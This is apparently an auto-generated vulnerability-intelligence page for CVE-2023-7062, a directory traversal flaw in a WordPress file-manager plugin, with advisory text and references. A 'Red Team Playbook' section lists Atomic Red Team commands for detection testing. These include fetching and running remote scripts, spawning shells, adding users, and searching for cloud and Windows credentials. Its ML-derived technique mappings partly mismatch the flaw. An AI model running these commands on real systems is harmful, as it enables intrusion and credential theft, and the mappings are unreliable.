CVE-2023-7062
Overview
This vulnerability is a directory traversal flaw in the Advanced File Manager Shortcodes WordPress plugin, affecting versions up to and including 2.4. The root cause lies in insufficient input validation of file path parameters within the plugin’s file management functionality, allowing traversal sequences to bypass intended directory restrictions. The affected component is the shortcode handler responsible for rendering and accessing file paths on the server.
Vulnerability Description
The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4. This makes it possible for attackers with contributor access or higher to read the contents of arbitrary files on the server, which can contain sensitive information.
Impact
An attacker with contributor or higher access can exploit this vulnerability to read arbitrary files on the server, potentially exposing sensitive configuration files, credentials, or other confidential data. The attack requires authenticated access with at least contributor privileges, as indicated by the CVSS vector (PR:L). Successful exploitation can result in significant data breaches and facilitate further attacks such as privilege escalation or lateral movement within the hosting environment.
Solution
Users should upgrade the Advanced File Manager Shortcodes plugin to a version later than 2.4, where this directory traversal vulnerability has been addressed. Detailed patch instructions and version updates are available from the vendor at https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve. No specific workaround is documented; applying the vendor-provided patch is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Advanced File Manager Shortcodes plugin for WordPress is characterized by a directory traversal flaw that affects all versions up to and including 2.4. This type of vulnerability allows an attacker to manipulate file paths in such a way that they can access files and directories that are outside the intended scope of the application. Specifically, it enables users with contributor access or higher to read arbitrary files on the server. The exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, user data, and other critical system files, which could be detrimental to the security posture of the affected system.
Attack vectors for this vulnerability are relatively straightforward, as they primarily involve crafting specially formatted requests that exploit the directory traversal flaw. An attacker could leverage this vulnerability by submitting input that includes traversal sequences, such as "../", to navigate the file system. For instance, if an attacker were to gain contributor access to a WordPress site, they could potentially read sensitive files like the wp-config.php file, which contains database credentials and other critical configuration details. Additionally, attackers could use this access to gather information about the server environment, which could further facilitate more sophisticated attacks, such as privilege escalation or data exfiltration.
The real-world impact of this vulnerability can be significant, particularly for businesses that rely on WordPress for their web presence. The ability to read sensitive files can lead to data breaches, which not only compromise the integrity and confidentiality of user data but also expose organizations to legal liabilities and reputational damage. Furthermore, the exploitation of this vulnerability could serve as a stepping stone for attackers to execute more damaging attacks, such as deploying malware or gaining full control over the affected server. The business risk is amplified in sectors that handle sensitive information, such as finance, healthcare, and e-commerce, where regulatory compliance is paramount.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that the Advanced File Manager Shortcodes plugin is updated to the latest version, as updates often include patches for known vulnerabilities. Regular vulnerability assessments and penetration testing should be conducted to identify and remediate potential security weaknesses in the web application. Additionally, organizations should enforce the principle of least privilege, ensuring that users have only the access necessary to perform their roles, thereby minimizing the risk of exploitation. Implementing web application firewalls (WAFs) can also help in detecting and blocking malicious requests that attempt to exploit directory traversal vulnerabilities.
In conclusion, the directory traversal vulnerability in the Advanced File Manager Shortcodes plugin poses a significant threat to WordPress installations, particularly those with contributor access. The potential for unauthorized access to sensitive files underscores the importance of maintaining robust security practices, including timely updates, access controls, and proactive monitoring. By adopting a comprehensive approach to vulnerability management, organizations can better protect their assets and mitigate the risks associated with such vulnerabilities.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-95 | WSDL Scanning |
37%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-7062 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/8bf009f5-cf9e-4d38-9679-d3abb5817d30?source=cve |
| advancedfilemanager.com |
GitHub CVE
|
https://advancedfilemanager.com/product/file-manager-advanced-shortcode-wordpress/ |